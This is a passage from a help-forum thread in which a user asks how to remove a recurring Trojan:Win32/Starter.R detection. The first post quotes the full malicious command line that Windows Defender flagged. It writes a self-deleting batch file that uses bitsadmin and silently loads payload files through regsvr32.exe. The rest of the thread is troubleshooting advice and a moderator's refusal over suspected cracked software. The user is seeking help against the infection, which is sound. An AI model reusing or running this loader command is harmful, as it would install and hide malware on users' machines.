Trojan:Win32/Starter.R at every restart and several times after reboot


  1. Posts : 10
    Windows 10 Pro x64
       #1

    Trojan:Win32/Starter.R at every restart and several times after reboot


    Whenever I start the computer, Windows Defender detects Trojan:Win32/Starter.R and this happens several times after, without restarting also.
    So far no anti-virus program was able to find a virus or trojan.
    Windows Defender gives me the info below:

    CmdLine: \Device\HarddiskVolume2\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /complete fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /cancel fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo if exist "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" goto q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\fc3929f4-0cf7-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\%i" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat")) > nul & echo :q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo del "C:\ProgramData\fc3929f4-0cf7-0\x.bat" ^& exit >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & "C:\ProgramData\fc3929f4-0cf7-0\x.bat""

    I do not know what it means, or how come this thing appears without a location.

    There is no fc3929f4-0cf7-0 folder in ProgramData, but of course these commands may have deleted it, after it runs. I am afraid these commands may also create other commands or batch files by using nul and bitsadmin. I am not sure. It apparently also uses regsvr32.exe. I do not know why it uses !=41cf7ce9fc3929f4 and for what.

    All I could do was make anti-virus checks with different programs. I do not know what to search for in regedit or in the computer to get rid of this.

    I also did System Restores to get the system around 10 days before, but it still came up.

    Thanks.
      My Computer


  2. Posts : 6,906
    windows 10
       #2

    Welcome to the forum

    please download and run Downloading Farbar Recovery Scan Tool

    Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
    Make sure that Addition option is checked.
    Press Scan button.
    It will produce a log called FRST.txt in the same directory the tool is run from.
    Please copy and paste log back .
    The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe).
      My Computer


  3. Posts : 10
    Windows 10 Pro x64
    Thread Starter
       #3

    I also have the addition.txt if you need.

    Attachment 212216
    Last edited by Rig18; 13 Nov 2018 at 18:28. Reason: spelling
      My Computer


  4. Posts : 6,906
    windows 10
       #4

    We need additions file
      My Computer


  5. Posts : 10
    Windows 10 Pro x64
    Thread Starter
       #5

    Here it is.

    Attachment 212232
      My Computer


  6. Posts : 6,906
    windows 10
       #6

    There is a problem in that you are showing a lot of cracks being used and either a pirated windows or office and you have hidden AlternateDataStream once you use cracks there is know way if they came with a free gift virus. There is a scanner specific for your malware

    WinThruster is Downloading...
      My Computer


  7. Posts : 12,725
    Windows 11 Pro
       #7

    @Rig18 and @Samuria, it is against forum rules to assist anyone with Cracked software. If you would like to read the rules of the forum they can be found here Forum Rules - Windows 10 Help Forums.

    If you would like to do a clean install with legal software and are still having problems, we would be happy to help. Otherwise we can offer no more assistance.
      My Computer


  8. Posts : 10
    Windows 10 Pro x64
    Thread Starter
       #8

    It is a genuine Windows. Computer is directly from a Microsoft partner. Have the label and license sticked to the back. I made the anti-virus checks without any exclusions. None of the programs showed any virus. If there are any AlternateDataStreams, they are not related to the operating system.
      My Computer


  9. Posts : 12,725
    Windows 11 Pro
       #9

    Any software on the computer.
      My Computer


 

  Related Discussions
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd
All times are GMT -5. The time now is 03:58.
Find Us




Windows 10 Forums